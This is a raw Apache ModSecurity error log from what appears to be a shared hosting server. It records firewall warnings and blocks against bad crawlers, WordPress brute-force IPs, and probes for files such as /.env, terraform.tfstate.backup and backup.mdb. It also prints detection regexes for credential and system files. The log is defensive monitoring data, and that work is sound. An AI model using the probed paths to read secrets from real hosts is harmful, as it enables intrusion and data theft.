[Tue May 26 13:07:55.232457 2026] [security2:error] [pid 485064:tid 485312] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN0j9tlF55stOmSqEg2wAAAPs"]
[Tue May 26 13:07:56.328252 2026] [security2:error] [pid 485064:tid 485291] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN0z9tlF55stOmSqEhEAAAAOY"]
[Tue May 26 13:07:56.979677 2026] [security2:error] [pid 485064:tid 485251] [client 195.2.79.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVN1D9tlF55stOmSqEhPQAAAL4"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1230859&moderation-hash=2aac02f82ca332a981ba185237eedd5a
[Tue May 26 13:07:57.836450 2026] [security2:error] [pid 485064:tid 485242] [client 195.2.79.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVN1T9tlF55stOmSqEhYQAAALU"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1230859&moderation-hash=2aac02f82ca332a981ba185237eedd5a
[Tue May 26 13:07:58.763715 2026] [security2:error] [pid 485064:tid 485304] [client 113.179.228.236:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahVN1j9tlF55stOmSqEhewAAAPM"]
[Tue May 26 13:07:59.297114 2026] [security2:error] [pid 485064:tid 485209] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN1j9tlF55stOmSqEhlQAAAJQ"]
[Tue May 26 13:08:01.716420 2026] [security2:error] [pid 485064:tid 485230] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN2T9tlF55stOmSqEh5gAAAKk"]
[Tue May 26 13:08:03.583253 2026] [security2:error] [pid 485064:tid 485319] [client 185.191.171.13:57516] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVN2z9tlF55stOmSqEiQwAAAQI"]
[Tue May 26 13:08:03.583352 2026] [security2:error] [pid 485064:tid 485319] [client 185.191.171.13:57516] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVN2z9tlF55stOmSqEiQwAAAQI"]
[Tue May 26 13:08:04.220157 2026] [security2:error] [pid 485064:tid 485216] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN2z9tlF55stOmSqEiSQAAAJs"]
[Tue May 26 13:08:06.564186 2026] [security2:error] [pid 485064:tid 485229] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN3j9tlF55stOmSqEioQAAAKg"]
[Tue May 26 13:08:08.272149 2026] [security2:error] [pid 485064:tid 485290] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN3z9tlF55stOmSqEi8AAAAOU"]
[Tue May 26 13:08:11.257398 2026] [security2:error] [pid 485064:tid 485309] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN4j9tlF55stOmSqEjbgAAAPg"]
[Tue May 26 13:08:12.294099 2026] [security2:error] [pid 485064:tid 485296] [client 176.65.139.237:47712] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "courses.bloggertarget.com"] [uri "/.env"] [unique_id "ahVN5D9tlF55stOmSqEjrQAAAOs"]
[Tue May 26 13:08:13.059172 2026] [security2:error] [pid 485064:tid 485244] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN5D9tlF55stOmSqEjwAAAALc"]
[Tue May 26 13:08:13.631777 2026] [security2:error] [pid 485064:tid 485301] [client 201.182.242.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahVN5T9tlF55stOmSqEj3QAAAPA"]
[Tue May 26 13:08:14.914216 2026] [security2:error] [pid 485064:tid 485252] [client 92.246.140.99:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN5j9tlF55stOmSqEkEQAAAL8"]
[Tue May 26 13:08:16.066369 2026] [security2:error] [pid 485064:tid 485240] [client 47.128.55.217:38424] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.oscpl.co.in"] [uri "/robots.txt"] [unique_id "ahVN6D9tlF55stOmSqEkUQAAALM"]
[Tue May 26 13:08:16.798472 2026] [security2:error] [pid 485064:tid 485242] [client 139.180.231.213:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVN6D9tlF55stOmSqEkbQAAALU"], referer: https://www.anujtradingco.com/
[Tue May 26 13:08:18.390719 2026] [security2:error] [pid 485064:tid 485225] [client 139.180.231.213:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVN6j9tlF55stOmSqEkvAAAAKQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1458685&moderation-hash=8a11f294cf0782f7f63e91da76b5f133
[Tue May 26 13:08:18.433535 2026] [security2:error] [pid 485064:tid 485263] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN6j9tlF55stOmSqEkqgAAAMo"]
[Tue May 26 13:08:20.229564 2026] [security2:error] [pid 485064:tid 485272] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVN7D9tlF55stOmSqElDQAAANM"]
[Tue May 26 13:08:20.340289 2026] [security2:error] [pid 485064:tid 485260] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVN7D9tlF55stOmSqElEwAAAMc"]
[Tue May 26 13:08:20.459753 2026] [security2:error] [pid 485064:tid 485291] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVN7D9tlF55stOmSqElHAAAAOY"]
[Tue May 26 13:08:20.665268 2026] [security2:error] [pid 485064:tid 485152] [remote 146.196.64.107:38732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.64.196.146.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVN7D9tlF55stOmSqElIQAA7lc"]
[Tue May 26 13:08:20.709170 2026] [security2:error] [pid 485064:tid 485203] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN7D9tlF55stOmSqElGQAAAI4"]
[Tue May 26 13:08:20.971936 2026] [security2:error] [pid 485064:tid 485196] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVN7D9tlF55stOmSqElOwAAAIc"]
[Tue May 26 13:08:21.463819 2026] [security2:error] [pid 485064:tid 485294] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVN7T9tlF55stOmSqElUQAAAOk"]
[Tue May 26 13:08:23.150061 2026] [security2:error] [pid 485064:tid 485274] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN7j9tlF55stOmSqEliQAAANU"]
[Tue May 26 13:08:23.399418 2026] [security2:error] [pid 485064:tid 485246] [client 139.180.231.213:60521] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVN7j9tlF55stOmSqElkQAAALk"], referer: https://anujtradingco.com
[Tue May 26 13:08:25.544012 2026] [security2:error] [pid 485064:tid 485282] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN8T9tlF55stOmSqEl5gAAAN0"]
[Tue May 26 13:08:26.495775 2026] [security2:error] [pid 485064:tid 485237] [client 74.7.228.30:52668] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "www.payment.pdrwebsolutions.cloud"] [uri "/robots.txt"] [unique_id "ahVN8j9tlF55stOmSqEmJgAAsHA"]
[Tue May 26 13:08:26.576244 2026] [security2:error] [pid 485064:tid 485207] [client 74.7.228.30:52668] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.payment.pdrwebsolutions.cloud"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "ahVN8j9tlF55stOmSqEmJwAAkgk"], referer: https://www.payment.pdrwebsolutions.cloud/robots.txt
[Tue May 26 13:08:27.754919 2026] [security2:error] [pid 485064:tid 485258] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN8z9tlF55stOmSqEmTAAAAMU"]
[Tue May 26 13:08:29.483451 2026] [security2:error] [pid 485064:tid 485308] [client 136.158.56.187:30591] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.56.158.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/xmlrpc.php"] [unique_id "ahVN9T9tlF55stOmSqEmoQAAAPc"]
[Tue May 26 13:08:29.483714 2026] [security2:error] [pid 485064:tid 485308] [client 136.158.56.187:30591] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "jailanitradingcompany.com"] [uri "/xmlrpc.php"] [unique_id "ahVN9T9tlF55stOmSqEmoQAAAPc"]
[Tue May 26 13:08:30.289742 2026] [security2:error] [pid 485064:tid 485208] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN9T9tlF55stOmSqEmtwAAAJM"]
[Tue May 26 13:08:31.817534 2026] [security2:error] [pid 485064:tid 485196] [client 136.158.56.187:30783] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.56.158.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jailanitradingcompany.com"] [uri "/xmlrpc.php"] [unique_id "ahVN9z9tlF55stOmSqEnCAAAAIc"]
[Tue May 26 13:08:31.817796 2026] [security2:error] [pid 485064:tid 485196] [client 136.158.56.187:30783] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "jailanitradingcompany.com"] [uri "/xmlrpc.php"] [unique_id "ahVN9z9tlF55stOmSqEnCAAAAIc"]
[Tue May 26 13:08:31.908103 2026] [security2:error] [pid 485064:tid 485223] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN9z9tlF55stOmSqEm_AAAAKI"]
[Tue May 26 13:08:34.445009 2026] [security2:error] [pid 485064:tid 485315] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN-T9tlF55stOmSqEnbwAAAP4"]
[Tue May 26 13:08:36.530975 2026] [security2:error] [pid 485064:tid 485209] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN_D9tlF55stOmSqEnvQAAAJQ"]
[Tue May 26 13:08:39.599939 2026] [security2:error] [pid 485064:tid 485268] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVN_z9tlF55stOmSqEoMQAAAM8"]
[Tue May 26 13:08:39.956436 2026] [security2:error] [pid 485064:tid 485219] [client 108.136.131.13:55684] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "cpcalendars.contabilidadecarioca.com.br"] [uri "/filemanager/dialog.php"] [unique_id "ahVN_z9tlF55stOmSqEoVwAAAJ4"]
[Tue May 26 13:08:40.524158 2026] [security2:error] [pid 485064:tid 485267] [client 113.178.171.155:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOAD9tlF55stOmSqEoYwAAAM4"]
[Tue May 26 13:08:41.336010 2026] [security2:error] [pid 485064:tid 485068] [remote 47.251.53.97:56604] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.53.251.47.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVOAT9tlF55stOmSqEohAAA8AM"]
[Tue May 26 13:08:41.858267 2026] [security2:error] [pid 485064:tid 485246] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOAT9tlF55stOmSqEokQAAALk"]
[Tue May 26 13:08:44.141017 2026] [security2:error] [pid 485064:tid 485320] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOAz9tlF55stOmSqEo6AAAAQM"]
[Tue May 26 13:08:45.853054 2026] [security2:error] [pid 485064:tid 485313] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOBT9tlF55stOmSqEpHQAAAPw"]
[Tue May 26 13:08:48.809955 2026] [security2:error] [pid 485064:tid 485280] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOCD9tlF55stOmSqEppQAAANs"]
[Tue May 26 13:08:50.583278 2026] [security2:error] [pid 485064:tid 485208] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOCj9tlF55stOmSqEp6wAAAJM"]
[Tue May 26 13:08:50.632883 2026] [security2:error] [pid 485064:tid 485147] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/terraform.tfstate.backup"] [unique_id "ahVOCj9tlF55stOmSqEp_gAA2lI"]
[Tue May 26 13:08:53.402387 2026] [security2:error] [pid 485064:tid 485271] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVODD9tlF55stOmSqEqTQAAANI"]
[Tue May 26 13:08:55.748814 2026] [security2:error] [pid 485064:tid 485225] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVODz9tlF55stOmSqEqqwAAAKQ"]
[Tue May 26 13:08:56.024402 2026] [security2:error] [pid 485064:tid 485084] [remote 51.79.229.9:37162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.229.79.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVODz9tlF55stOmSqEqwQAAuhM"]
[Tue May 26 13:08:56.919406 2026] [proxy:error] [pid 485064:tid 485091] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:08:56.919452 2026] [proxy_http:error] [pid 485064:tid 485091] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:08:56.920073 2026] [proxy:error] [pid 485064:tid 485091] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:08:56.920105 2026] [proxy_http:error] [pid 485064:tid 485091] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:08:58.158872 2026] [security2:error] [pid 485064:tid 485106] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.mdb$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1282"] [id "390589"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .mdb)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/backup.mdb"] [unique_id "ahVOEj9tlF55stOmSqErCwAA9yk"]
[Tue May 26 13:08:58.186600 2026] [security2:error] [pid 485064:tid 485268] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOET9tlF55stOmSqEq9gAAAM8"]
[Tue May 26 13:08:58.296176 2026] [security2:error] [pid 485064:tid 485208] [client 43.172.194.99:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVOEj9tlF55stOmSqErDgAAAJM"]
[Tue May 26 13:08:59.823471 2026] [security2:error] [pid 485064:tid 485272] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOEz9tlF55stOmSqErLwAAANM"]
[Tue May 26 13:09:01.228740 2026] [security2:error] [pid 485064:tid 485302] [client 91.196.152.133:58451] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.prototypecommune.azurmediatec.com"] [uri "/index.php"] [unique_id "ahVOFD9tlF55stOmSqErRAAAAPE"]
[Tue May 26 13:09:02.174868 2026] [security2:error] [pid 485064:tid 485262] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOFT9tlF55stOmSqErfAAAAMk"]
[Tue May 26 13:09:02.232740 2026] [security2:error] [pid 485064:tid 485185] [remote 110.249.201.79:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "kingsclub.in"] [uri "/robots.txt"] [unique_id "ahVOFj9tlF55stOmSqEriQAA1Hg"]
[Tue May 26 13:09:02.666796 2026] [proxy:error] [pid 485064:tid 485135] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:09:02.666849 2026] [proxy_http:error] [pid 485064:tid 485135] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:09:02.667421 2026] [proxy:error] [pid 485064:tid 485135] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:09:02.667453 2026] [proxy_http:error] [pid 485064:tid 485135] [remote 157.143.84.87:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
